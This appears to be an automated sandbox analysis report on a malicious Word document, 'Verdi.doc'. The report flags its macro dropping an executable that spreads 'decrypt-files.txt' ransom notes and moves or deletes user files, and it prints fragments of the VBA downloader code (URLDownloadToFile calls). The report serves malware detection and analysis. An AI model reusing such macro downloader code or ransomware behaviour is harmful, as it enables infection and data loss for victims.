Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\crypto\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-312302014-279660585-3511680526-1004\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\document building blocks\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\document building blocks\1033\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\document building blocks\1033\14\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\internet explorer\userdata\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\mmc\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\office\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\office\recent\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\proof\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\protect\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\protect\s-1-5-21-312302014-279660585-3511680526-1004\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\speech\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\certificates\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\crls\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\ctls\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\document themes\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\document themes\1033\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\smartart graphics\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\smartart graphics\1033\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\word document building blocks\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\word document building blocks\1033\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\document themes\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\document themes\1033\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\smartart graphics\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\smartart graphics\1033\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\word document building blocks\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\word document building blocks\1033\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\uproof\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\cookies\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\cookies\low\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\dntexception\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\dntexception\low\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\iecompatcache\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\iecompatcache\low\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\iecompatuacache\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\iecompatuacache\low\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\iedownloadhistory\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\libraries\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\network shortcuts\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\printer shortcuts\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\privacie\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\privacie\low\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\recent\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\recent\automaticdestinations\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\recent\customdestinations\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\recent items\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\sendto\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\administrative tools\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\maintenance\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\templates\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\windows\themes\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\word\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\word\startup\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\extensions\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\events\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\bookmarkbackups\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\crashes\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\crashes\events\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\datareporting\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\datareporting\archived\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\datareporting\archived\2016-12\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp\winnt_x86-msvc\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp-eme-adobe\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp-eme-adobe\15\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp-gmpopenh264\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\healthreport\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\minidumps\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\saved-telemetry-pings\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\sessionstore-backups\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\chrome\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\chrome\idb\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.files\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\webapps\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\sun\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\sun\java\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\sun\java\deployment\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\contacts\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\desktop\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\desktop\bnagmgsplo\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\desktop\eowrvpqccs\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\desktop\gaobcviqij\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\desktop\palrgucveh\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\desktop\qncycdfijj\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\desktop\sqsjkebwdt\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\documents\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\documents\bnagmgsplo\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\documents\eowrvpqccs\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\documents\gaobcviqij\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\documents\my music\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\documents\my pictures\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\documents\my videos\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\documents\palrgucveh\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\documents\qncycdfijj\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\documents\sqsjkebwdt\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\downloads\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\favorites\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\favorites\links\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\favorites\links for united states\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\links\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\recent\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\saved games\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\searches\decrypt-files.txt	Jump to behavior

Modifies existing user documents (likely ransomware behavior)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	File moved: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File deleted: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File moved: C:\Users\user\Desktop\GAOBCVIQIJ\QNCYCDFIJJ.xlsx	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File deleted: C:\Users\user\Desktop\GAOBCVIQIJ\QNCYCDFIJJ.xlsx	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File moved: C:\Users\user\Desktop\QCFWYSKMHA.pdf	Jump to behavior

System Summary:

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: Verdi.doc	OLE, VBA macro line: Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: Verdi.doc	OLE, VBA macro line: Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: Verdi.doc	OLE, VBA macro line: Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: Verdi.doc	OLE, VBA macro line: Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: Verdi.doc	OLE, VBA macro line: URLDownloadToFile 0, v1, v2, 0, 0
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function dwn1, String urldownloadtofile: URLDownloadToFile 0, v1, v2, 0, 0	Name: dwn1

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Windows\Temp\wupd12.14.tmp			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp			Jump to dropped file

Contains functionality to communicate with device drivers

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Code function: 5_2_00401430: DeviceIoControl,

5_2_00401430

Creates files inside the system directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Windows\Temp\wupd12.14.tmp

Jump to behavior

Creates mutexes

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

Mutant created: \Sessions\1\BaseNamedObjects\Global\5e4c085c3c4e0000

Detected potential crypto function

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_00423849	5_2_00423849
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_0040C460	5_2_0040C460
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_00406273	5_2_00406273
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_00409230	5_2_00409230
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_00406CF0	5_2_00406CF0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_00437560	5_2_00437560
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0	5_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219EF	5_2_004219EF
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C5A40	5_2_004C5A40
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C6853	5_2_004C6853
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C7E65	5_2_004C7E65
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C3275	5_2_004C3275
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C6A0D	5_2_004C6A0D
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004CD408	5_2_004CD408
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C860B	5_2_004C860B
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C9207	5_2_004C9207
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004CC018	5_2_004CC018
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C5C1B	5_2_004C5C1B
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C7A3C	5_2_004C7A3C
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004CCED8	5_2_004CCED8
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004CC6D0	5_2_004CC6D0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C98D2	5_2_004C98D2
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C16EF	5_2_004C16EF
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C3CE1	5_2_004C3CE1
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C6EF0	5_2_004C6EF0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C668E	5_2_004C668E
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004CBE83	5_2_004CBE83
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C909D	5_2_004C909D
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C1894	5_2_004C1894
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C9A95	5_2_004C9A95
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C70A7	5_2_004C70A7
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C134E	5_2_004C134E
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C2F44	5_2_004C2F44
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004DA346	5_2_004DA346
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C895D	5_2_004C895D
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C476D	5_2_004C476D
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C6B77	5_2_004C6B77
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C3970	5_2_004C3970
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004CD770	5_2_004CD770
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C9700	5_2_004C9700
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C2103	5_2_004C2103
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C3B3C	5_2_004C3B3C
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C6139	5_2_004C6139
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004D8B38	5_2_004D8B38
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C633B	5_2_004C633B
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C6D33	5_2_004C6D33
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004DBBCE	5_2_004DBBCE
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C5DC3	5_2_004C5DC3
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004DB1EC	5_2_004DB1EC
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004CB3EB	5_2_004CB3EB
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004CA1F8	5_2_004CA1F8
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C33F4	5_2_004C33F4
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004CA989	5_2_004CA989
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C2D84	5_2_004C2D84
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C8B98	5_2_004C8B98
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C3597	5_2_004C3597
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004CCB92	5_2_004CCB92
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C2BAE	5_2_004C2BAE
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C5FA4	5_2_004C5FA4
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C37A0	5_2_004C37A0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C9FA2	5_2_004C9FA2
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004C51B2	5_2_004C51B2

Document contains embedded VBA macros

Show sources

Source: Verdi.doc

OLE indicator, VBA macros: true

Document contains no OLE stream with summary information

Show sources

